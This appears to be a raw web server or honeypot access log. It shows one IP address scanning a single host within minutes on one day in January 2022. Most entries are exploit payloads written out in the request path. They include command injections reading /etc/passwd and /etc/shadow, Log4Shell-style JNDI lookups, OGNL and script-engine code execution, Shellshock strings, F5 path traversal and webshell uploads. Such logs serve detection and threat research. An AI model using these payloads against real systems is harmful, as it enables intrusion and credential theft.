| 20220127-18:50:59 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /boardDataWW.php |
| 20220127-18:51:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /upload/UploadResourcePic.ashx?ResourceID=8382 |
| 20220127-18:51:26 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /imc/javax.faces.resource/dynamiccontent.properties.xhtml |
| 20220127-18:51:29 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | /imc/javax.faces.resource/dynamiccontent.properties.xhtml |
| 20220127-18:51:29 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /reports/rwservlet/showenv |
| 20220127-18:51:30 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /ws_utc/resources/setting/options |
| 20220127-18:51:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// |
| 20220127-18:51:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /ws_utc/resources/setting/keystore |
| 20220127-18:51:40 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /webadm/?q=moni_detail.do&action=gragh |
| 20220127-18:51:55 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 |
| 20220127-18:52:00 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== |
| 20220127-18:52:02 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== |
| 20220127-18:52:52 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | 54.89.6.87 |
| 20220127-18:52:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 | /webtools/control/main |
| 20220127-18:53:11 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /console/login/LoginForm.jsp |
| 20220127-18:53:43 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /search.php?search=%22;wget+http%3A%2F%2F%27;%22 |
| 20220127-18:54:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F | /users/sign_in |
| 20220127-18:54:50 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData |
| 20220127-18:54:51 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /system/sharedir.php |
| 20220127-18:54:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /en/php/usb_sync.php |
| 20220127-18:55:05 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData |
| 20220127-18:55:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /webtools/control/SOAPService |
| 20220127-18:55:17 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 | /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 |
| 20220127-18:55:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 |
| 20220127-18:55:34 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /_search?pretty |
| 20220127-18:55:50 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=24IBLUiucBEzjeniiESsiRxC18N.php&target=l1_Lw |
| 20220127-18:56:00 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 | http://54.89.6.87 |
| 20220127-18:56:00 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /ajax/render/widget_tabbedcontainer_tab_panel |
| 20220127-18:56:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /webadmin/script?command=|%20nslookup%20 |
| 20220127-18:56:03 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /assets/data/usrimg/24iblupmwyvecstjcpxodebxug5.php |
| 20220127-18:56:06 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /directdata/direct/router |
| 20220127-18:56:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /poc.txt |
| 20220127-18:56:09 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /cgi-bin/login?LD_DEBUG=files |
| 20220127-18:56:56 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /seeyon/thirdpartyController.do.css/..;/ajax.do |
| 20220127-18:57:44 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /Upload/upload_file.php?l=test |
| 20220127-18:57:46 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /Upload/test/test.php |
| 20220127-18:58:37 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E |
| 20220127-18:58:57 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D./a%7D |
| 20220127-18:58:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | https://54.89.6.87 |
| 20220127-18:59:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /actions/authenticate.php |
| 20220127-18:59:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | https://54.89.6.87 |
| 20220127-18:59:41 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /sitecore/shell/ClientBin/Reporting/Report.ashx |
| 20220127-18:59:42 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 |
| 20220127-18:59:52 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /api/user/reg |
| 20220127-18:59:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /api/group/list |
| 20220127-18:59:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /openam/oauth2/..;/ccversion/Version |
| 20220127-18:59:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D |
| 20220127-19:00:23 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | http://54.89.6.87/mainFrame.htm |
| 20220127-19:00:25 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | http://54.89.6.87/mainFrame.htm |
| 20220127-19:00:28 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm |
| 20220127-19:00:30 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/24IBLSwIbX3MLDiUwnzcU2CaOs3.jsp |
| 20220127-19:00:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /plugin/add |
| 20220127-19:00:37 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /plugin/customMethod |
| 20220127-19:01:19 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | 54.89.6.87/module/login/login.html |
| 20220127-19:01:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /cgi-bin/login.cgi |
| 20220127-19:01:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; |
| 20220127-19:02:34 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp |
| 20220127-19:02:45 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow |
| 20220127-19:02:49 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 | /(download)/tmp/poc.txt |
| 20220127-19:02:59 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd |
| 20220127-19:03:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release |
| 20220127-19:03:03 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license |
| 20220127-19:03:05 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /hsqldb%0a |
| 20220127-19:03:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /tmui/locallb/workspace/tmshCmd.jsp |
| 20220127-19:03:10 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /tmui/locallb/workspace/fileSave.jsp |
| 20220127-19:03:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /tmui/locallb/workspace/tmshCmd.jsp |
| 20220127-19:03:14 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /tmui/locallb/workspace/tmshCmd.jsp |
| 20220127-19:03:50 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /lucee/admin/imgProcess.cfm?file=/whatever |
| 20220127-19:03:52 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /lucee/admin/imgProcess.cfm?file=/../../../context/24IBLTQjJE86AsRudIG8koxOq0a.cfm |
| 20220127-19:03:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /lucee/24IBLTQjJE86AsRudIG8koxOq0a.cfm |
| 20220127-19:04:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /cgi-bin/mainfunction.cgi |
| 20220127-19:04:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /login.action |
| 20220127-19:04:55 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | https://54.89.6.87 |
| 20220127-19:05:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | https://54.89.6.87/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData |
| 20220127-19:05:03 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | https://54.89.6.87/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData |
| 20220127-19:05:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /.%0d./.%0d./.%0d./.%0d./bin/sh |
| 20220127-19:05:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /cgi-bin/file_transfer.cgi |
| 20220127-19:05:33 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /login/ |
| 20220127-19:05:39 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) |
| 20220127-19:05:46 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | https://54.89.6.87/manage/account/login?redirect=%2Fmanage |
| 20220127-19:05:48 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /qvisdvr/ |
| 20220127-19:05:56 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /v1/backend1 |
| 20220127-19:05:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /v1/24IBLZ4sgyYQinqYiEJbrbPdz2J.php |
| 20220127-19:06:09 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /x |
| 20220127-19:06:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /jars/upload |
| 20220127-19:06:38 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1 |
| 20220127-19:06:39 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /poc.txt |
| 20220127-19:06:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /console/images/%252e%252e%252fconsole.portal |
| 20220127-19:07:05 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /24IBLSf0sVWzPAmp3k9mPNGksk0.php |
| 20220127-19:07:29 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F | /_ignition/execute-solution |
| 20220127-19:07:30 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /_ignition/execute-solution |
| 20220127-19:07:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | /_ignition/execute-solution |
| 20220127-19:07:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /_ignition/execute-solution |
| 20220127-19:07:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | /pages/createpage-entervariables.action?SpaceKey=x |
| 20220127-19:07:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /_ignition/execute-solution |
| 20220127-19:07:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /pages/createpage-entervariables.action |
| 20220127-19:07:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 | /_ignition/execute-solution |
| 20220127-19:07:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /confluence/pages/createpage-entervariables.action?SpaceKey=x |
| 20220127-19:07:33 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 | /confluence/pages/createpage-entervariables.action |
| 20220127-19:07:33 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 | /wiki/pages/createpage-entervariables.action?SpaceKey=x |
| 20220127-19:07:34 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /wiki/pages/createpage-entervariables.action |
| 20220127-19:07:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /pages/doenterpagevariables.action |
| 20220127-19:07:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 | /pages/createpage.action?spaceKey=myproj |
| 20220127-19:07:36 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /pages/templates2/viewpagetemplate.action |
| 20220127-19:07:36 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /pages/createpage-entervariables.action |
| 20220127-19:07:37 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /template/custom/content-editor |
| 20220127-19:07:37 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /templates/editor-preload-container |
| 20220127-19:07:38 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /users/user-dark-features |
| 20220127-19:09:19 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:19 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | () { ignored; }; echo Content-Type |
